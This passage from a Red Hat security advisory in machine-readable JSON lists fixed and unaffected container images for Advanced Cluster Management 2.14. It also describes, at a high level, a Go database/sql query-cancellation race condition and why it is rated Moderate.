"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
